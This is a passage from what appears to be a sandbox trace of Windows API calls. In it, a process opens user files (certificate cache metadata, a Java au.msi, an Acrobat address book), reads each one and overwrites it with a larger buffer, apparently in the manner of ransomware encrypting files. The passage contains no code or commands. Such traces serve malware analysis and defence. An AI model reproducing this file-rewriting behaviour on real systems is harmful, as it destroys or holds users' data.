lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.190] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6e3 [0176.191] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.191] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.191] ReleaseMutex (hMutex=0x168) returned 1 [0176.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0176.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpUsedDefaultChar=0x0) returned 65 [0176.191] ReadFile (in: hFile=0x1dc, lpBuffer=0x28469b8, nNumberOfBytesToRead=0x6e3, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesRead=0x331f2bc*=0x6e3, lpOverlapped=0x0) returned 1 [0176.193] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0176.193] WriteFile (in: hFile=0x1dc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xc6b, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f2d0*=0xc6b, lpOverlapped=0x0) returned 1 [0176.193] CloseHandle (hObject=0x1dc) returned 1 [0176.193] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.194] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.194] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x190 [0176.194] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.194] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.194] ReleaseMutex (hMutex=0x168) returned 1 [0176.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0176.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpUsedDefaultChar=0x0) returned 65 [0176.194] ReadFile (in: hFile=0x1dc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x190, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x331f2bc*=0x190, lpOverlapped=0x0) returned 1 [0176.195] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0176.195] WriteFile (in: hFile=0x1dc, lpBuffer=0x2890128*, nNumberOfBytesToWrite=0x718, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2890128*, lpNumberOfBytesWritten=0x331f2d0*=0x718, lpOverlapped=0x0) returned 1 [0176.196] CloseHandle (hObject=0x1dc) returned 1 [0176.196] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.196] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.197] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1ae [0176.197] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.197] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.197] ReleaseMutex (hMutex=0x168) returned 1 [0176.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0176.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpUsedDefaultChar=0x0) returned 65 [0176.197] ReadFile (in: hFile=0x1dc, lpBuffer=0x25af228, nNumberOfBytesToRead=0x1ae, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25af228*, lpNumberOfBytesRead=0x331f2bc*=0x1ae, lpOverlapped=0x0) returned 1 [0176.198] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0176.198] WriteFile (in: hFile=0x1dc, lpBuffer=0x2890128*, nNumberOfBytesToWrite=0x736, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2890128*, lpNumberOfBytesWritten=0x331f2d0*=0x736, lpOverlapped=0x0) returned 1 [0176.202] CloseHandle (hObject=0x1dc) returned 1 [0176.203] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.203] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.203] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1b2 [0176.203] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.203] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.203] ReleaseMutex (hMutex=0x168) returned 1 [0176.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0176.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpUsedDefaultChar=0x0) returned 65 [0176.204] ReadFile (in: hFile=0x1dc, lpBuffer=0x25af228, nNumberOfBytesToRead=0x1b2, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25af228*, lpNumberOfBytesRead=0x331f2bc*=0x1b2, lpOverlapped=0x0) returned 1 [0176.205] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0176.205] WriteFile (in: hFile=0x1dc, lpBuffer=0x2890128*, nNumberOfBytesToWrite=0x73a, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2890128*, lpNumberOfBytesWritten=0x331f2d0*=0x73a, lpOverlapped=0x0) returned 1 [0176.205] CloseHandle (hObject=0x1dc) returned 1 [0176.205] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.206] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.206] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x182 [0176.206] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.206] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.206] ReleaseMutex (hMutex=0x168) returned 1 [0176.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0176.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpUsedDefaultChar=0x0) returned 65 [0176.206] ReadFile (in: hFile=0x1dc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x331f2bc*=0x182, lpOverlapped=0x0) returned 1 [0176.207] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0176.207] WriteFile (in: hFile=0x1dc, lpBuffer=0x2890128*, nNumberOfBytesToWrite=0x70a, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2890128*, lpNumberOfBytesWritten=0x331f2d0*=0x70a, lpOverlapped=0x0) returned 1 [0176.208] CloseHandle (hObject=0x1dc) returned 1 [0176.208] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.209] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.209] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x188 [0176.209] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.209] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.209] ReleaseMutex (hMutex=0x168) returned 1 [0176.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0176.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpUsedDefaultChar=0x0) returned 65 [0176.209] ReadFile (in: hFile=0x1dc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x188, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x331f2bc*=0x188, lpOverlapped=0x0) returned 1 [0176.210] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0176.210] WriteFile (in: hFile=0x1dc, lpBuffer=0x2890128*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2890128*, lpNumberOfBytesWritten=0x331f2d0*=0x710, lpOverlapped=0x0) returned 1 [0176.211] CloseHandle (hObject=0x1dc) returned 1 [0176.211] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0177.853] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.853] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1ae [0177.853] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.854] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.854] ReleaseMutex (hMutex=0x168) returned 1 [0177.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0177.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpUsedDefaultChar=0x0) returned 65 [0177.854] ReadFile (in: hFile=0x208, lpBuffer=0x25af228, nNumberOfBytesToRead=0x1ae, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25af228*, lpNumberOfBytesRead=0x331f2bc*=0x1ae, lpOverlapped=0x0) returned 1 [0177.855] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0177.855] WriteFile (in: hFile=0x208, lpBuffer=0x2848ae8*, nNumberOfBytesToWrite=0x736, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848ae8*, lpNumberOfBytesWritten=0x331f2d0*=0x736, lpOverlapped=0x0) returned 1 [0177.855] CloseHandle (hObject=0x208) returned 1 [0177.855] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0177.856] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.857] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x18e [0177.857] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.857] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.857] ReleaseMutex (hMutex=0x168) returned 1 [0177.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0177.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpUsedDefaultChar=0x0) returned 65 [0177.857] ReadFile (in: hFile=0x208, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x18e, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x331f2bc*=0x18e, lpOverlapped=0x0) returned 1 [0177.858] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0177.858] WriteFile (in: hFile=0x208, lpBuffer=0x2848ae8*, nNumberOfBytesToWrite=0x716, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848ae8*, lpNumberOfBytesWritten=0x331f2d0*=0x716, lpOverlapped=0x0) returned 1 [0177.858] CloseHandle (hObject=0x208) returned 1 [0177.859] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0177.860] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.860] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2d400 [0177.860] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.860] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.860] ReleaseMutex (hMutex=0x168) returned 1 [0177.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="au.msi", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0177.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="au.msi", cchWideChar=6, lpMultiByteStr=0x1f7ad5c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="au.msi", lpUsedDefaultChar=0x0) returned 6 [0177.860] ReadFile (in: hFile=0x208, lpBuffer=0x2840938, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0177.863] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2c400 [0177.863] ReadFile (in: hFile=0x208, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.864] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2c400 [0177.864] WriteFile (in: hFile=0x208, lpBuffer=0x284a998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x284a998*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.865] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0177.865] WriteFile (in: hFile=0x208, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0177.865] CloseHandle (hObject=0x208) returned 1 [0177.865] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0177.866] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.866] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1517 [0177.866] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.866] WaitForSingleObject 